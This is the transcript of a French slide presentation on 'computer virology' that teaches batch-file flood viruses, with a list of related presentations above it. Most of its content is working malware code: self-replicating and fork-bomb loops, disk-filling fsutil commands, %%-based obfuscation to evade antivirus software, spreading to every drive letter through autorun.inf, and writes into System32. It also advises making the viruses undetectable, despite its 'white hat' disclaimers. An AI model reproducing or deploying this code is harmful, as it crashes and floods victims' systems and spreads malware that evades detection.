VIROLOGIE INFORMATIQUE

Slides:



Advertisements
Présentations similaires
Les sauvegardes Pourquoi sauvegarder ? Que sauvegarder ? Quand sauvegarder ? Ou sauvegarder ? Et comment ?
Advertisements

Les polluants dans une pile et les effets sur la nature Les polluants d'une pile Les effets sur la nature.
VIRUS ET ANTIVIRUS Fléau majeur de l'informatique, les virus sont aussi présents sur internet. Qu'ils s'attaquent au secteur d'amorce de vos disques, aux.
Pour la fixation des erreurs de registre de Windows 8.2 vous devez soit faire usage de la méthode manuelle ou vous pouvez même utiliser l'outil de réparation.
Le système Raid 5 Table des matières Qu'est ce que le RAID ? Les objectifs Le raid 5 Les avantages et les inconvénients Les composants d’un Raid.
Quelques commandes de base I. Se déplacer dans l'arborescence Change directory (cd), print working directory (pwd) II. Lister des fichiers List (ls) III.
La sécurité Un sujet TRES vaste ! Qu'est ce qu'un « hacker » ? Risques pour un utilisateur lambda ? Comment s'y prennent-ils !? Comment se protéger ? Tout.
Master ESEEC Rédaction de documents (longs) structurés Patrice Séébold Bureau 109, Bât B.
Les journées de l’2015 Le Model-Based Design Une approche complète en sciences industrielles de l’ingénieur Frédéric MAZET Lycée Dumont d’Urville Toulon.
VIRUS INFORMATIQUE VIRUS INFORMATIQUE ZIP UNZIP CRYPTO-POLYMORPHISME
Les mémoires de l’ordinateur
Les commandes externes
TP23 Bilan activité 1 : Mise en évidence de l'existence d'une mémoire immunitaire et de son support 1- Lors d'une greffe de peau d'une souris A à une souris.
L’ordinateur et ses composants
VIRUS INFORMATIQUE Codage, art, présentation, partage, auteur : Samuel De Cruz. Ce document contient plusieurs de mes virus informatiques. La réalisation.
Architecture des ordinateurs, Environnement Numérique de Travail
Mise en place d’un système de partage de fichiers
Exercice 8 : Déterminez l’algorithme permettant à votre calculatrice de donner les racines de n’importe quel polynôme de degré 2.
Les Instructions Itératives (Les Boucles)
VIRUS INFORMATIQUE VIRUS INFORMATIQUE PROCESSUS RANDOMIZING - ALEATORISATION en BATCH Par : Samuel De Cruz, étudiant Licence 3 – Psychologie.
Ce videoclip produit par l’Ecole Polytechnique Fédérale de Lausanne
VIRUS INFORMATIQUE VIRUS INFORMATIQUE CRYPTOVIROLOGIE POLYMORPHISME en BATCH Par : Samuel De Cruz, étudiant Licence 3 – Psychologie.
Ce videoclip produit par l’Ecole Polytechnique Fédérale de Lausanne
Ce videoclip produit par l’Ecole Polytechnique Fédérale de Lausanne
Dominique PETRELLA – Frédéric GUINEPAIN - IA-IPR STI Versailles
Comment et pourquoi partager
Automatisez votre expérience utilisateur Veeam
VIRUS INFORMATIQUE VIRUS INFORMATIQUE METAMORPHISME avec SUBSEQUENCE
Birkenkopff Hugo, Nay Léo.
TRANSMETTRE/APPRENDRE
Cours de Préparation aux Etudes Supérieures PES
VIRUS INFORMATIQUE VIRUS INFORMATIQUE CRYPTOVIROLOGIE VBS POLYMORPHISME Par : Samuel De Cruz, étudiant Licence 3 – Psychologie.
VIRUS INFORMATIQUE VIRUS INFORMATIQUE MUTATION / PERMUTATION BLOC METAMORPHISME Par : Samuel De Cruz, étudiant Licence 3 – Psychologie.
Comprendre ce que je lis : Choisir un livre à son niveau
Journée Analyse D0, 19 janvier 2004
Généralités sur les systèmes automatisés et l'informatique industrielle.
Comment prend-t-on une décision?
Centralisation de logs
Comprendre ce que je lis : Choisir un livre à son niveau
Etude de cas : différencier ses clients pour comprendre les attentes de chaque cible Exemple d’e-cover E-cover a réussi à transformer de simples pneus.
Les Algorithmes 1°) Définition : « Algorithme » signifie « … ».
Windows 7 NTFS.
CopiesEnLigne (CEL) TUTORIEL INTERACTIF
Et la vie lycéenne Vous présentent.
COMPUTER VIRUS BATCH - VIRUS avec PERMUTATION / METAMORPHISME
Exercice 8 : Déterminez l’algorithme permettant à votre calculatrice de donner les racines de n’importe quel polynôme de degré 2.
L ES I NSTRUCTIONS I TÉRATIVES (L ES B OUCLES ) Réalisé par : OUZEGGANE Redouane Département de Technologie Faculté de Technologie – Université A.Mira,
Les différentes étapes et gestion de la rédaction d’un courriel
Livret utilisateurs X656dte - X736de
Le sida est la forme avancée et visible d’une infection au départ sans symptôme, causée par le VIH (Virus de l’Immunodéficience Humaine). Le sida ou syndrome.
Les éléments et les composés sont des substances
Protégez l’entreprise contre les attaques informatiques
Expose : Web Application Firewall.
Architecture des ordinateurs
La messagerie électronique
SECURITE DES E MAILS By Spargo DIAPO NON AUTO.
PRÉVENIR LES INFECTIONS ASSOCIÉES AUX SOINS
Simulation Multi-Agent (SMA)&plateforme Netlogo 1.
SECURITE DES E MAILS Cliquez pour avancer !.
Flowchart Itération Cours 04.
Docteur… Je veux comprendre !. A l’école, il nous est tous arrivé au moins une fois d’être malade; mais certains le sont plus souvent que d’autres, c’est.
SECURITE DES E MAILS Cliquez pour avancer !.
Tableau de bord d’un système de recommandation
Formation Dragon NaturallySpeaking
1. République Tunisienne Ministère de l’enseignement Supérieur et de la recherche scientifique et de technologie Institut supérieur d’études Technologiques.
Utilisation de la danse à des fins d’enseignement scolaire
À vos tranferts d’ s SECURITE DES S Faite très attention à vos tranferts d’ s.
À vos tranferts d’ s SECURITE DES S Faite très attention à vos tranferts d’ s.
Implémentation de FTP Rappel sur FTP Relation entre un site Web et FTP
Les Commandes de base Linux. 1 L’aide sur les commandes Linux ◦ help : obtenir de l’aide pour une commande interne du shell. Elle permet aussi d'afficher.
Transcription de la présentation:

VIROLOGIE INFORMATIQUE Auteur : Samuel De Cruz VIROLOGIE INFORMATIQUE Etude : virus flood, noyage disque dur. Rédaction 15/10/2017. Samuel De Cruz (NEPRAM HACKER catégorie White Hat / étudiant psychologue et psychanalyste, diplômé en informatique et anglais et école supérieure.) Étude strictement bienveillante en matière de virologie informatique, pour la curiosité et l’intellectualisme. Usage non-hostile. Contact : samdec86@yahoo.fr

Dans ce document nous allons étudier les différents algorithmes de virus batch pour la menace Flood. Le « Flood », qui signifie « noyer » en anglais, est le sens figuré de l’attaque qui impose dans l’espace mémoire une quantité énorme d’éléments (fichiers, dossiers…). Le but d’une attaque flood étant de perturber, allant jusqu’à saturer un espace pour le ralentir ou le stopper. Nouvelles générations de Virus Bactériophages rassemblés sur la membrane plasmique d’une bactérie infectée (E-colli). On remarque dans le cytoplasme d’autres virus en cours de maturité. La quantité de virus va bientôt saturer l’environnement. Dans ce document, ce qui nous intéresse c’est l’analogie de la quantité ainsi que quelques suppléments uniques du monde informatique. En d’autres termes, nous allons voir comment un virus informatique peut faire de nombreuses copies de lui-même sans dépendre d’un host, comment effectuer une pollution massive, mais aussi, comment perturber l’espace d’un disque dur rapidement.

Type %~nx0 >> %random%.bat goto :Loop En virologie informatique nous ne sommes pas obliger de dépendre d’un host pour la multiplication virale. Exemple avec ce script ultra simple. Le virus.bat vient d’effectuer en 1 seconde 5 copies de lui-même. @echo off Type %~nx0 >> %random%.bat pause Nous pouvons donc utiliser ce type de d’auto-multiplication pour noyer un espace (et par le même effort, polluer), un ordinateur. Le script ci-dessous sera encore plus redoutable car sans fin… Nous utilisons là, la boucle Loop. @echo off :Loop Type %~nx0 >> %random%.bat goto :Loop

set ALPHA=XX%random%XXX Type %~nx0 >> %ALPHA%.bat Pour un effet encore plus redoutable et dévastateur, nous pouvons utiliser la progression de saturation par l’exponentiel. Dans ce cas, non seulement le virus va effectuer des copies de lui-même sans fin (jusqu’à le crash système), mais il va aussi lancer l’exécution des copies ! Se sera une saturation exponentielle. @echo off :loop set ALPHA=XX%random%XXX Type %~nx0 >> %ALPHA%.bat start %ALPHA%.bat goto :loop EXPONENTIELLE @echo off :Loop Type %~nx0 >> %random%.bat goto :Loop NON-EXPONENTIEL

Auto-multiplication rapide du virus « VIRUS.bat » / Samuel De Cruz Analogie Biologie Informatique : Multiplication. (bien que la machinerie permettant cette multiplication est différente dans ce cas d’exemple, la quantité massive du virus est identique.) Le virus Amaril Le virus Amaril ( cause la Fièvre Jaune) – virus en quantité massive, saturation de l’environnement de l’infection. Le virus « VIRUS.Bat », début de saturation dans son environnement : le dossier laboratoire. Auto-multiplication rapide du virus « VIRUS.bat » / Samuel De Cruz

@ec%SsdfsdfS%ho of%oezhfukjsdbhfdsf%f :flood La violence FLOOD n’est pas uniquement par copie du virus lui-même, nous pouvons aussi faire de la pollution massive. @echo off Mkdir %random% EXIT Redoutable et dévastateur : Plus avancé et protégé (on intègre dans l’algorithme des crypto par %%), ainsi l’Antivirus à plus de mal à trouver le virus : @echo off :Loop Mkdir %random% Goto :Loop @ec%SsdfsdfS%ho of%oezhfukjsdbhfdsf%f :flood mkd%oezhfkjsfsf%ir %random% PAUSE g%DSFCVXCV%oto :flood

echo >%random%.docx echo >%random%.ppt echo >%random%.pdf La violence FLOOD via multi-formats. Pas une violence Flood mais j’en profite pour en parler rapidement : la violence FARK BOMB : @echo off echo >%random%.mp3 echo >%random%.docx echo >%random%.ppt echo >%random%.pdf echo >%random%.jpg echo >%random%.mp4 @echo off :Loop start Goto :Loop @echo off :Loop Start Goto :Loop @echo off :Loop echo >%random%.mp3 echo >%random%.docx echo >%random%.ppt echo >%random%.pdf echo >%random%.jpg echo >%random%.mp4 Goto :Loop

fsutil file createnew alpha 50000000 pause Utilisation de la commande FSUTIL pour saturer l’espace. @echo off fsutil file createnew alpha 50000000 pause Utilisation de la commande FSUTIL pour saturer l’espace avec %random% et taille 50000000 Vous pouvez constater que le fichier fait bien env. 50 Mo, pourtant…il est vide. @echo off fsutil file createnew %random% 50000000 pause

Ce qui rend cette commande redoutable, c’est que l’on peut facilement et rapidement saturer un disque dur avec juste quelques fichiers, sans passer par un flood massif. Un exemple avec un fichier totalement vide, mais qui manifeste 488 Mo de taille ! Avec le fichier polluant réalisé Sans le fichier polluant réalisé

REM -------- CURRENT DIR FLOOD Se%XXXX%t DFSHGFHQSBGKGKBHS=fsutil Mélange de violence flood fsutil et mkdir. On y remarque la crypto par %% interne. Pollution de plusieurs Go. @echo off REM -------- CURRENT DIR FLOOD Se%XXXX%t DFSHGFHQSBGKGKBHS=fsutil %DFSHGFHQSBGKGKBHS% file c%XXXX%re%DQSDQSFQSFQ%atenew %random% 1000000000 Ec%XXXX%ho. M%OOO%kdir %random% %DFSHGFHQSBGKGKBHS% file c%XXXX%r%DQSDQSFQSFQ%eatenew %random% 1000000000 %DFSHGFHQSBGKGKBHS% file cr%XXXX%eatene%DQSDQSFQSFQ%w %random% 1000000000 Ech%XXXX%o. %DFSHGFHQSBGKGKBHS% file c%DQSDQSFQSFQ%reatenew %random% 1000000000 (…)

for %%E In (A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) Do ( Différents algorithmes pour la violence flood au-delà du disque. INFECTION copy %~nx0 A:\%random%.bat > NUL copy %~nx0 B:\%random%.bat > NUL copy %~nx0 C:\%random%.bat > NUL copy %~nx0 D:\%random%.bat > NUL copy %~nx0 E:\%random%.bat > NUL copy %~nx0 F:\%random%.bat > NUL copy %~nx0 G:\%random%.bat > NUL copy %~nx0 H:\%random%.bat > NUL copy %~nx0 I:\%random%.bat > NUL copy %~nx0 J:\%random%.bat > NUL copy %~nx0 K:\%random%.bat > NUL copy %~nx0 L:\%random%.bat > NUL copy %~nx0 M:\%random%.bat > NUL copy %~nx0 N:\%random%.bat > NUL copy %~nx0 O:\%random%.bat > NUL copy %~nx0 P:\%random%.bat > NUL copy %~nx0 Q:\%random%.bat > NUL copy %~nx0 R:\%random%.bat > NUL copy %~nx0 S:\%random%.bat > NUL copy %~nx0 T:\%random%.bat > NUL copy %~nx0 U:\%random%.bat > NUL copy %~nx0 V:\%random%.bat > NUL copy %~nx0 W:\%random%.bat > NUL copy %~nx0 X:\%random%.bat > NUL copy %~nx0 Y/\%random%.bat > NUL copy %~nx0 Z:\%random%.bat > NUL @echo off for %%E In (A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) Do ( copy /Y %0 %%E:\ echo [AutoRun] > %%E:\autorun.inf echo open="%%E:\%0" >> %%E:\autorun.inf echo action=Open folder to see files... >> %%E:\autorun.inf)

Différents algorithmes pour la violence flood au-delà du disque. @echo off echo %random% > "C:\Windows\System32\%random%" echo %random% > "C:\Windows\System32\%random%«  Exemple de pollution, de flood, et de copies multiples par les premiers test du virus «  NYPERIUS », un virus d’étude visible. @echo off echo %random% > "%userprofile%\Desktop\%random%" echo %random% > "%userprofile%\Desktop\%random%"

Exemple de violence par le virus « NYPERIUS » : le virus-maman fabrique des sous-virus (enfant-soldats) qui eux réalisent des pollutions et violences flood. Aussi, la crypto %% interne des sous-virus change, via un petit polymorphisme.

Discussion : La violence flood (et pollution) est extrêmement utile en virologie informatique. Elle permet de saturer l’espace de la victime, de perturber son environnement, elle apporte de l’inquiétude chez la cible. Il est intéressant aussi de combiner flood et copie du virus lui-même, pour augmenter sa survie, tout en songeant à cacher les copies. On peut aussi réaliser de fausses copies du virus pour tromper l’antivirus et la victime. Cependant, il faut comprendre que le flood est une violence basique, une attaque pauvre…elle n’est ni brillante ni complexe. Aussi, elle attire la conscience de la victime. Il faut, surtout, penser à rendre le virus indétectable, structurellement, mais aussi, comportementalement. Point important : Les commandes (fsutil, mkdir, start…) sont légales et passionnantes. C’est l’usage humain qui peut être malveillant. Il est rappelé que ce document est une étude bienveillante pour les informaticiens (curieux de comprendre la virologie pour mieux sécuriser l’environnement cyber), et pour les Hackers White Hat (curiosité et intellectualisme). Aucunement, ce document valorise l’usage nuisible. Il est recommandé d’avoir de très bonnes connaissances en informatique pour étudier pacifiquement la virologie, afin d’éviter les accidents. Merci pour votre attention Strictement pour étude bienveillante Auteur : Samuel De Cruz (samdec86@yahoo.fr)